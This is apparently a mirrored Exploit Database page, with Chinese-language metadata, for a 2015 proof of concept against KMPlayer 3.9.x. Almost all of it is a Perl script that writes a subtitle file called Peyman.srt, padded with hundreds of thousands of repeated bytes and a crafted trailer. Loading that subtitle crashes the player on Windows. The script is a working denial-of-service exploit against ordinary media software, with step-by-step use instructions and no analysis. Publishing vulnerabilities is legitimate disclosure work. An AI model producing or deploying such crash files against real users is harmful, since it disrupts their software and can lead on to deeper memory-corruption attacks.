KMPlayer 3.9.x – ‘.srt’ Crash (PoC)

• Exploit Database
• 122 阅读

• 作者： Peyman Motevalli Manesh
  日期： 2015-07-31
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37717/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  #!/usr/bin/perl -w # Title : KMPlayer 3.9.x - Crash Proof Of Concept # Company : http://www.kmplayer.com # Tested : Windows 7 / Windows 8.1 # # # Author: Peyman Motevalli Manesh # Linkedin: https://ir.linkedin.com/in/peymanmotevalli # E-Mail: me[at]PDPnetwork[dot]ir # Website : www.PDPnetwork.ir # FaceBook: https://www.facebook.com/Peyman.Motevalli # # # 1 . run perl code : perl km.pl # 2 . open "kmplayer" # 3 . Load Subtitle (Peyman.srt) # 4 . Crashed $eheader="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x14"; $h="\x42"x9850; $poc="\x41"x500000; $poc="$h$poc$eheader"; open (Peyman, &apos;>Peyman.srt&apos;); for ($i=1;$i<=4;$i++){ print Peyman "$i\n00:00:01,800 --> 00:00:05,500\n"; print Peyman $poc; } close (Peyman);